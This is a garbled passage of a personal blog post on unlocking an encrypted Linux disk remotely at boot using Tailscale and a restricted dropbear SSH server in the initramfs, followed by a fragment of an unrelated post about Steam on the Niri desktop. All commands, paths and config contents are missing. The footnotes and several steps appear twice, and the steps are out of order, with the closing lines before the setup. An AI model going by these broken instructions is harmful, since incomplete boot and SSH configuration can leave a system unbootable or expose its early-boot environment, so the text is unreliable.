godspeed.) All this rigamarole is necessary because the OS doesn't set the network interfaces to predictable names until late boot, so it needs some way to know which interface to use. Last but not least, rebuild your initramfs: . Next time you reboot, you should be able to ssh into and get a prompt that looks like this: In which a moral is imparted, and our scene concluded. The takeaway here is the same as in all my other posts: if you think something isn't possible to do with a computer, have you considered applying more violence? and I believe in Windows, although I’m less sure about that ↩ sometimes /boot/EFI ↩ Here “initrd” stands for “initramdisk”, which is another word for our initramfs system. ↩ See the docs for more information about this. ↩ Sometimes my home loses power and the desktop shuts off. Sometimes when the power comes back on it has a new public IP. Networking in initramfs Tailscale in initramfs SSH in initramfs Putting tailscale in initramfs means that it has unencrypted keys lying around. Tailscale keys expire (by default) after 90 days. At that point this will all break. You really really don’t want people to get SSH access to your early boot environment. Use Tailscale ACLs to only allow incoming connections to initramfs, not outgoing connections. Set the key to never expire. Set the SSH server to disallow all shells except the actual unlock command ( ). Install the dropbear SSH server: Install the systemd packages: Add networking ( ), tailscale ( ), and dropbear ( ) to : Set up the keys for your new tailscale device: In the tailscale web console , mark your new device with , and disable key expiry. It should look something like this: In , configure dropbear to only allow running the unlock command and nothing else: Tell systemd to wait forever for a decryption password. I use , so I edited . Under , I extended the existing to . 4 Copy your public keys into so they get picked up by the dropbear hook: Generate a new public/private keypair for use by the dropbear server. Setup early networking. (Note: these instructions are only for Ethernet connections. If you want WiFi in early boot, good luck and godspeed.) Add the following config in : Register it in so it gets picked up by the hook: Last but not least, rebuild your initramfs: . and I believe in Windows, although I’m less sure about that ↩ sometimes /boot/EFI ↩ Here “initrd” stands for “initramdisk”, which is another word for our initramfs system. ↩ See the docs for more information about this. ↩

0 views
Jason Scheirer 1 months ago

Steam on non-Conventional Desktops (Niri)

I’m trying out Niri ! You know how I encourage getting used to the defaults ? Well I’m not following my own advice ! I’m using it with Dank Shell too, also ignoring my own advice ! Anyhow! One liner! If Steam isn’t working do this: edit and change the line to this:

0 views